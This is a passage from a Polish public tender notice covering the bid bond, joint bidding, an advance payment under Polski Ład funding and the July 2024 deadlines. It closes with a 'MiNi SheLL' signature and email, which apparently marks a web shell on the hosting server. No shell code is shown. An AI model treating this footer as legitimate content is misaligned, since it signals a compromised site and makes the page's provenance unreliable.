do podpisania oferty - jeżeli dotyczy;<br/>10. Dokument wadium, w przypadku wniesienia wadium w formie, o której mowa w rozdziale XXI pkt 4 SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Oferta musi być zabezpieczona wadium w wysokości 16 000,00 zł (słownie: szesnaście tysięcy złotych 00/100)<br/>2.	Wadium może być wniesione w: <br/>a)	pieniądzu, <br/>b)	gwarancjach bankowych, <br/>c)	gwarancjach ubezpieczeniowych, <br/>d)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 usta- wy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. 2019 r. poz. 310, 836, 1572). <br/>3.	Wadium wniesione w formie pieniężnej należy wpłacić przelewem na rachunek bankowy Zamawiającego: Bank Spółdzielczy w Nowej Soli 10 9674 0006 0000 0030 3390 0003.<br/>Szczegóły w rozdziale XXI SWZ <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie<br/>zamówienia (w tym spółka cywilna):<br/>1) Zgodnie z art. 58 ust. 2 ustawy Prawo zamówień publicznych, ustanawiają oni pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.<br/>2) Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy PZP, składa wraz z ofertą, każdy<br/>z wykonawców wspólnie ubiegający się o udzielenie zamówienia. Oświadczenia te potwierdzają brak podstaw wykluczenia<br/>oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków<br/>udziału w postępowaniu.<br/>3) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają<br/>roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>4) W przypadku, o którym mowa w ppkt. 3) dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane,<br/>dostawy, usługi wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> Zamawiający wypłaci Wykonawcy zaliczkę w wysokości 2% kwoty brutto określonej w ust. 1 Umowy, tj. wynagrodzenia brutto wykonawcy. <br/>Zaliczka stanowi wkład własny wskazany we wstępnej promesie dotyczącej dofinansowania inwestycji z Programu Rządowy Fundusz POLSKI ŁAD: Programu Inwestycji Strategicznych nr Edycja6PGR/2023/3700/PolskiLad <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany do umowy szczegółowo zawarte są w projekcie umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-02 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-02 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-07-31</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com